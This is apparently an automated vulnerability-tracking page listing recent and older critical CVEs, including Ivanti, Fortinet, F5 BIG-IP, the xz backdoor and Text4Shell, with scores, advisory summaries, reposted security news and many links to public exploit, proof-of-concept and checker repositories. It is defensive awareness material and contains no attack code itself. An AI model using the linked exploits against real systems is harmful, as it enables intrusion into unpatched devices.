Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

Sempf@infosec.exchange at 2025-04-26T04:01:08.000Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

#ruby #cve

##

AAKL@infosec.exchange at 2025-04-25T14:06:31.000Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews #cybersecurity #Infosec #Ruby

##

CVE-2025-0282
(9.1 CRITICAL)

EPSS: 92.34%

updated 2025-01-28T18:32:27

7 posts

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

10 repos

https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

https://github.com/44xo/CVE-2025-0282

https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser

https://github.com/AdaniKamal/CVE-2025-0282

https://github.com/almanatra/CVE-2025-0282

https://github.com/watchtowrlabs/CVE-2025-0282

https://github.com/punitdarji/Ivanti-CVE-2025-0282

https://github.com/sfewer-r7/CVE-2025-0282

https://github.com/rxwx/pulse-meter

https://github.com/AnonStorks/CVE-2025-0282-Full-version

ClubTeleMatique@mstdn.social at 2025-04-25T17:15:46.000Z ##

Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo #news #IT

##

AAKL at 2025-04-25T14:08:50.422Z ##

JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure blogs.jpcert.or.jp/en/2025/04/

More:

The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo @thehackernews

##

jos1264@social.skynetcloud.site at 2025-04-25T20:00:03.000Z ##

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks – Source:thehackernews.com ciso2ciso.com/dslogdrat-malwar #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #DslogdRAT

##

ClubTeleMatique@mstdn.social at 2025-04-25T17:15:46.000Z ##

Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo #news #IT

##

AAKL@infosec.exchange at 2025-04-25T14:08:50.000Z ##

JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure blogs.jpcert.or.jp/en/2025/04/

More:

The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware

##

jos1264@social.skynetcloud.site at 2025-04-25T09:40:02.000Z ##

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo

##

jos1264@social.skynetcloud.site at 2025-04-25T09:40:02.000Z ##

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo

##

CVE-2018-0171
(9.8 CRITICAL)

EPSS: 89.10%

updated 2025-01-27T21:31:51

1 posts

A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by se

2 repos

https://github.com/hellowenying/CVE2018-0171

https://github.com/AlrikRr/Cisco-Smart-Exploit

hrbrmstr@mastodon.social at 2025-04-24T13:57:04.000Z ##

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

##

CVE-2024-21762
(9.8 CRITICAL)

EPSS: 91.37%

updated 2024-11-29T15:23:32.167000

1 posts

A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or co

8 repos

https://github.com/cleverg0d/CVE-2024-21762-Checker

https://github.com/XiaomingX/cve-2024-21762-poc

https://github.com/h4x0r-dz/CVE-2024-21762

https://github.com/BishopFox/cve-2024-21762-check

https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check

https://github.com/rdoix/cve-2024-21762-checker

https://github.com/d0rb/CVE-2024-21762

https://github.com/bsekercioglu/cve2024-21762-ShodanChecker

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2024-9441
(9.8 CRITICAL)

EPSS: 57.36%

updated 2024-10-02T21:30:35

1 posts

The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS command injection vulnerability. A remote and unauthenticated attacker can execute arbitrary OS commands via the login_id parameter when invoking the forgot_password functionality over HTTP.

4 repos

https://github.com/adhikara13/CVE-2024-9441

https://github.com/p33d/CVE-2024-9441

https://github.com/jk-mayne/CVE-2024-9441-Checker

https://github.com/XiaomingX/cve-2024-9441-poc

beyondmachines1@infosec.exchange at 2025-04-25T12:01:35.000Z ##

Nice reports critical flaw in Linear eMerge E3

Critical vulnerability CVE-2024-9441 (CVSS 9.8) in Nice's Linear eMerge E3 access control system allows unauthenticated remote attackers to execute arbitrary OS commands through the login_id parameter in the forgot_password functionality. All versions through 1.00-07 affected and no patch is currently available.

**If you are using Nice Linear eMerge E3 access control system, be aware that it's vulnerable. Make sure it's isolated from the internet and accessible only from trusted networks, and reach out to the vendor for patch timing.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2024-6235(CVSS UNKNOWN)

EPSS: 21.21%

updated 2024-07-31T05:02:58

1 posts

Sensitive information disclosure in NetScaler Console

Nuclei template

catc0n@infosec.exchange at 2025-04-22T21:22:18.000Z ##

Some nifty n-day vuln analysis from the team (Calum Hutton) this week: Citrix NetScaler Console CVE-2024-6235 allows an unauthenticated attacker to obtain an admin-level session ID from an internal API and use this to create other admin users on the system.

attackerkb.com/assessments/3bf

##

CVE-2020-5902
(9.8 CRITICAL)

EPSS: 94.44%

updated 2024-07-25T18:33:36

1 posts

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Nuclei template

57 repos

https://github.com/cybersecurityworks553/scanner-CVE-2020-5902

https://github.com/yasserjanah/CVE-2020-5902

https://github.com/ar0dd/CVE-2020-5902

https://github.com/jas502n/CVE-2020-5902

https://github.com/dunderhay/CVE-2020-5902

https://github.com/qiong-qi/CVE-2020-5902-POC

https://github.com/Shu1L/CVE-2020-5902-fofa-scan

https://github.com/GovindPalakkal/EvilRip

https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker

https://github.com/corelight/CVE-2020-5902-F5BigIP

https://github.com/Al1ex/CVE-2020-5902

https://github.com/0xAbdullah/CVE-2020-5902

https://github.com/qlkwej/poc-CVE-2020-5902

https://github.com/superzerosec/cve-2020-5902

https://github.com/wdlid/CVE-2020-5902-fix

https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902

https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker

https://github.com/west9b/F5-BIG-IP-POC

https://github.com/r0ttenbeef/cve-2020-5902

https://github.com/dnerzker/CVE-2020-5902

https://github.com/inho28/CVE-2020-5902-F5-BIGIP

https://github.com/jiansiting/CVE-2020-5902

https://github.com/ltvthang/CVE-2020-5903

https://github.com/34zY/APT-Backpack

https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter

https://github.com/rockmelodies/CVE-2020-5902-rce-gui

https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner

https://github.com/jinnywc/CVE-2020-5902

https://github.com/yassineaboukir/CVE-2020-5902

https://github.com/PushpenderIndia/CVE-2020-5902-Scanner

https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP

https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902

https://github.com/GoodiesHQ/F5-Patch

https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability

https://github.com/aqhmal/CVE-2020-5902-Scanner

https://github.com/murataydemir/CVE-2020-5902

https://github.com/renanhsilva/checkvulnCVE20205902

https://github.com/rwincey/CVE-2020-5902-NSE

https://github.com/ajdumanhug/CVE-2020-5902

https://github.com/haisenberg/CVE-2020-5902

https://github.com/momika233/cve-2020-5902

https://github.com/sv3nbeast/CVE-2020-5902_RCE

https://github.com/z3n70/CVE-2020-5902

https://github.com/flyopenair/CVE-2020-5902

https://github.com/zhzyker/CVE-2020-5902

https://github.com/k3nundrum/CVE-2020-5902

https://github.com/JSec1337/RCE-CVE-2020-5902

https://github.com/freeFV/CVE-2020-5902-fofa-scan

https://github.com/halencarjunior/f5scan

https://github.com/zhzyker/exphub

https://github.com/MrCl0wnLab/checker-CVE-2020-5902

https://github.com/theLSA/f5-bigip-rce-cve-2020-5902

https://github.com/Any3ite/CVE-2020-5902-F5BIG

https://github.com/cristiano-corrado/f5_scanner

https://github.com/nsflabs/CVE-2020-5902

https://github.com/dwisiswant0/CVE-2020-5902

https://github.com/amitlttwo/CVE-2020-5902

hrbrmstr@mastodon.social at 2025-04-24T13:57:04.000Z ##

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

##

CVE-2024-6407
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-07-11T12:30:56

1 posts

CWE-200: Information Exposure vulnerability exists that could cause disclosure of credentials when a specially crafted message is sent to the device.

beyondmachines1@infosec.exchange at 2025-04-23T13:01:07.000Z ##

Schneider Electric reports critical flaw in Wiser Home Controller WHC-5918A

The Schneider Electric Wiser Home Controller WHC-5918A contains a critical security vulnerability (CVE-2024-6407, CVSS 9.8) allowing attackers to extract sensitive credentials by sending specially crafted messages. Schneider is recommending complete replacement of the discontinued device with their newer C-Bus Home Controller model as no security patches will be released.

**If you are using Schneider Electric Wiser Home Controller WHC-5918A devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2023-27997
(9.8 CRITICAL)

EPSS: 91.01%

updated 2024-04-04T04:45:33

1 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically c

10 repos

https://github.com/delsploit/CVE-2023-27997

https://github.com/BishopFox/CVE-2023-27997-check

https://github.com/rio128128/CVE-2023-27997-POC

https://github.com/TechinsightsPro/ShodanFortiOS

https://github.com/puckiestyle/cve-2023-27997

https://github.com/lexfo/xortigate-cve-2023-27997

https://github.com/onurkerembozkurt/fgt-cve-2023-27997-exploit

https://github.com/imbas007/CVE-2023-27997-Check

https://github.com/node011/CVE-2023-27997-POC

https://github.com/Cyb3rEnthusiast/CVE-2023-27997

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2024-3094
(10.0 CRITICAL)

EPSS: 90.84%

updated 2024-03-29T18:30:50

1 posts

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. The tarballs included extra .m4 files, which contained instructions for building with automake that did not exist in the repository. These instructions, through a series of complex obfuscations, extract a prebuilt object file from one of the test archives, which is then used to modify specific functions in t

Nuclei template

62 repos

https://github.com/badsectorlabs/ludus_xz_backdoor

https://github.com/been22426/CVE-2024-3094

https://github.com/emirkmo/xz-backdoor-github

https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer

https://github.com/r0binak/xzk8s

https://github.com/neuralinhibitor/xzwhy

https://github.com/jfrog/cve-2024-3094-tools

https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check

https://github.com/mightysai1997/CVE-2024-3094-info

https://github.com/0xlane/xz-cve-2024-3094

https://github.com/bioless/xz_cve-2024-3094_detection

https://github.com/iheb2b/CVE-2024-3094-Checker

https://github.com/harekrishnarai/xz-utils-vuln-checker

https://github.com/Horizon-Software-Development/CVE-2024-3094

https://github.com/crfearnworks/ansible-CVE-2024-3094

https://github.com/isuruwa/CVE-2024-3094

https://github.com/hackingetico21/revisaxzutils

https://github.com/przemoc/xz-backdoor-links

https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector

https://github.com/byinarie/CVE-2024-3094-info

https://github.com/robertdebock/ansible-playbook-cve-2024-3094

https://github.com/dah4k/CVE-2024-3094

https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker

https://github.com/ScrimForever/CVE-2024-3094

https://github.com/weltregie/liblzma-scan

https://github.com/wgetnz/CVE-2024-3094-check

https://github.com/robertdfrench/ifuncd-up

https://github.com/FabioBaroni/CVE-2024-3094-checker

https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094

https://github.com/buluma/ansible-role-cve_2024_3094

https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container

https://github.com/amlweems/xzbot

https://github.com/lockness-Ko/xz-vulnerable-honeypot

https://github.com/ackemed/detectar_cve-2024-3094

https://github.com/brinhosa/CVE-2024-3094-One-Liner

https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094

https://github.com/gustavorobertux/CVE-2024-3094

https://github.com/felipecosta09/cve-2024-3094

https://github.com/robertdebock/ansible-role-cve_2024_3094

https://github.com/reuteras/CVE-2024-3094

https://github.com/Juul/xz-backdoor-scan

https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check

https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-

https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits

https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione

https://github.com/pentestfunctions/CVE-2024-3094

https://github.com/XiaomingX/cve-2024-3094-xz-backdoor-exploit

https://github.com/bsekercioglu/cve2024-3094-Checker

https://github.com/Yuma-Tsushima07/CVE-2024-3094

https://github.com/shefirot/CVE-2024-3094

https://github.com/Fractal-Tess/CVE-2024-3094

https://github.com/Simplifi-ED/CVE-2024-3094-patcher

https://github.com/ashwani95/CVE-2024-3094

https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script

https://github.com/hazemkya/CVE-2024-3094-checker

https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker

https://github.com/DANO-AMP/CVE-2024-3094

https://github.com/mightysai1997/CVE-2024-3094

https://github.com/mesutgungor/xz-backdoor-vulnerability

https://github.com/teyhouse/CVE-2024-3094

https://github.com/galacticquest/cve-2024-3094-detect

https://github.com/Mustafa1986/CVE-2024-3094

arXiv_csSE_bot@mastoxiv.page at 2025-04-25T07:21:50.000Z ##

Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack

Piotr Przymus (Nicolaus Copernicus University in Torun, Poland), Thomas Durieux (TU Delft & Endor Labs, The Netherlands)
arxiv.org/abs/2504.17473 arxiv.org/pdf/2504.17473 arxiv.org/html/2504.17473

arXiv:2504.17473v1 Announce Type: new
Abstract: The digital economy runs on Open Source Software (OSS), with an estimated 90\% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline, analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.

#toXiv_bot_toot

##

CVE-2022-42889
(9.8 CRITICAL)

EPSS: 94.16%

updated 2024-01-19T20:49:34

1 posts

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included in

Nuclei template

49 repos

https://github.com/devenes/text4shell-cve-2022-42889

https://github.com/SeanWrightSec/CVE-2022-42889-PoC

https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889

https://github.com/MendDemo-josh/cve-2022-42889-text4shell

https://github.com/Sic4rio/CVE-2022-42889

https://github.com/sunnyvale-it/CVE-2022-42889-PoC

https://github.com/HKirito/CVE-2022-33980

https://github.com/smileostrich/Text4Shell-Scanner

https://github.com/Vulnmachines/text4shell-CVE-2022-42889

https://github.com/pwnb0y/Text4shell-exploit

https://github.com/kljunowsky/CVE-2022-42889-text4shell

https://github.com/Gotcha1G/CVE-2022-42889

https://github.com/dgor2023/cve-2022-42889-text4shell-docker

https://github.com/ClickCyber/cve-2022-42889

https://github.com/neerazz/CVE-2022-42889

https://github.com/YulinSec/t4scan

https://github.com/necroteddy/CVE-2022-42889

https://github.com/34006133/CVE-2022-42889

https://github.com/QAInsights/cve-2022-42889-jmeter

https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker

https://github.com/cxzero/CVE-2022-42889-text4shell

https://github.com/karthikuj/cve-2022-42889-text4shell-docker

https://github.com/joshbnewton31080/cve-2022-42889-text4shell

https://github.com/tulhan/commons-text-goat

https://github.com/akshayithape-devops/CVE-2022-42889-POC

https://github.com/808ale/CVE-2022-42889-Text4Shell-POC

https://github.com/stavrosgns/Text4ShellPayloads

https://github.com/aaronm-sysdig/text4shell-docker

https://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL

https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker

https://github.com/kiralab/text4shell-scan

https://github.com/gokul-ramesh/text4shell-exploit

https://github.com/s3l33/CVE-2022-42889

https://github.com/korteke/CVE-2022-42889-POC

https://github.com/eunomie/cve-2022-42889-check

https://github.com/chainguard-dev/text4shell-policy

https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889

https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC

https://github.com/cryxnet/CVE-2022-42889-RCE

https://github.com/Afrouper/MavenDependencyCVE-Scanner

https://github.com/uk0/cve-2022-42889-intercept

https://github.com/rockmelodies/CVE-2022-42889

https://github.com/hotblac/text4shell

https://github.com/f0ng/text4shellburpscanner

https://github.com/Dima2021/cve-2022-42889-text4shell

https://github.com/humbss/CVE-2022-42889

https://github.com/securekomodo/text4shell-poc

https://github.com/chaudharyarjun/text4shell-exploit

https://github.com/DimaMend/cve-2022-42889-text4shell

SoLSec@mastodon.social at 2025-04-23T18:14:11.000Z ##

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 kitploit.com/2025/04/text4shel

##

CVE-2025-3132
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos

https://github.com/rxerium/CVE-2025-31324

AAKL at 2025-04-25T16:48:43.342Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable

##

AAKL@infosec.exchange at 2025-04-25T16:48:43.000Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable #cybersecurity #infosec #zeroday

##

CVE-2025-22234
(0 None)

EPSS: 0.00%

3 posts

N/A

CVE-2025-1763
(0 None)

EPSS: 0.00%

1 posts

N/A

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-2443
(0 None)

EPSS: 0.00%

1 posts

N/A

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2024-55571
(0 None)

EPSS: 0.00%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-24T13:11:24.000Z ##

This SQLi in Centreon Web is from a month ago but the CVE was published today.

thewatch.centreon.com/latest-s

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-21605
(0 None)

EPSS: 0.03%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-23T16:43:12.000Z ##

Redis DoS.

github.com/redis/redis/securit

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Redis is an open source, in-memory database that persists on disk. In versions starting at 2.6 and prior to 7.4.3, An unauthenticated client can cause unlimited growth of output buffers, until the server runs out of memory or is killed. By default, the Redis configuration does not limit the output buffer of normal clients (see client-output-buffer-limit). Therefore, the output buffer can grow unlimitedly over time. As a result, the service is exhausted and the memory is unavailable. When password authentication is enabled on the Redis server, but no password is provided, the client can still cause the output buffer to grow from "NOAUTH" responses until the system will run out of memory. This issue has been patched in version 7.4.3. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways. Either using network access control tools like firewalls, iptables, security groups, etc, or enabling TLS and requiring users to authenticate using client side certificates.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32966
(0 None)

EPSS: 0.04%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-23T16:17:45.000Z ##

Post-auth RCE in DataEase.

github.com/dataease/dataease/s

sev:HIGH 8.2 - CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

DataEase is an open-source BI tool alternative to Tableau. Prior to version 2.10.8, authenticated users can complete RCE through the backend JDBC link. This issue has been patched in version 2.10.8.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32958
(0 None)

EPSS: 0.04%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-21T21:30:17.000Z ##

This is kind of a neat race condition:

github.com/AdeptLanguage/Adept

sev:CRIT 9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in the AdeptLanguage/Adept repository. This issue has been patched in commit a1a41b7.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32438
(0 None)

EPSS: 0.01%

1 posts

N/A

Visit counter For Websites